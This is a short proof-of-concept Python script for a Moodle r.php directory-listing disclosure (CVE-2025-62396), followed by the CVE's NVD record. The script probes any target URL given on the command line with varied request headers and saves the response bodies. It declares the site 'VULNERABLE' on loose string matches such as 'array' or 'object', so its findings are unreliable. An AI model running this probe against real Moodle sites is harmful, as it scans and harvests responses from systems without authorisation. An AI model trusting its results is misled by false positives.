CVE-2025-62396

# CVE-2025-62396 Moodle Directory Listing Information Disclosure PoC # Description: Error-handling issue in Moodle router (r.php) exposes internal directory listings import requests import sys def test_cve_2025_62396(target_url): """ Test for CVE-2025-62396: Moodle router directory listing disclosure This PoC demonstrates how specific HTTP headers can trigger error handling that exposes internal directory structures. """ print(f"[*] Testing target: {target_url}") # Target the Moodle router script endpoint = f"{target_url.rstrip('/')}/r.php" # Malformed requests that may trigger error handling headers_list = [ { 'Content-Type': 'application/x-www-form-urlencoded', 'Accept': 'text/html,application/xhtml+xml' }, { 'Content-Type': 'multipart/form-data; boundary=----WebKitFormBoundary', 'X-Requested-With': 'XMLHttpRequest' }, { 'Accept': 'application/json', 'Content-Type': 'text/plain' } ] for i, headers in enumerate(headers_list, 1): print(f"\n[*] Test {i} with headers: {headers}") try: # Send request with malformed headers response = requests.get( endpoint, headers=headers, params={'error': 'test'}, timeout=10, allow_redirects=False ) # Check for directory listing indicators if response.status_code in [200, 500] and any(indicator in response.text.lower() for indicator in [ 'index of', 'directory listing', '<title>index of', 'parent directory', '[tostring]', 'array', 'object' ]): print(f"[!] VULNERABLE! Directory listing may be exposed") print(f"[!] Response length: {len(response.text)} bytes") # Save response for analysis filename = f"response_{i}.txt" with open(filename, 'w', encoding='utf-8') as f: f.write(f"=== Request Headers ===\n") f.write(str(headers) + "\n\n") f.write(f"=== Response Headers ===\n") f.write(str(response.headers) + "\n\n") f.write(f"=== Response Body ===\n") f.write(response.text) print(f"[*] Response saved to {filename}") return True except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}") print("\n[*] No obvious vulnerability indicators found") return False if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python cve-2025-62396.py <target_url>") print("Example: python cve-2025-62396.py http://moodle.example.com") sys.exit(1) target = sys.argv[1] test_cve_2025_62396(target)

{"cve": {"id": "CVE-2025-62396", "sourceIdentifier": "[email protected]", "published": "2025-10-23T12:15:31.913", "lastModified": "2025-11-14T19:21:00.760", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An error-handling issue in the Moodle router (r.php) could cause the application to display internal directory listings when specific HTTP headers were not properly configured."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-548"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:moodle:moodle:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.5.0", "versionEndExcluding": "4.5.7", "matchCriteriaId": "5414437D-2D9C-4565-853F-EAF761F52E5E"}, {"vulnerable": true, "criteria": "cpe:2.3:a:moodle:moodle:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.0.0", "versionEndExcluding": "5.0.3", "matchCriteriaId": "672DBB86-D5A8-41B6-B6F3-8E323E9C21F0"}]}]}], "references": [{"url": "https://access.redhat.com/security/cve/CVE-2025-62396", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2404429", "source": "[email protected]", "tags": ["Issue Tracking", "Third Party Advisory"]}]}}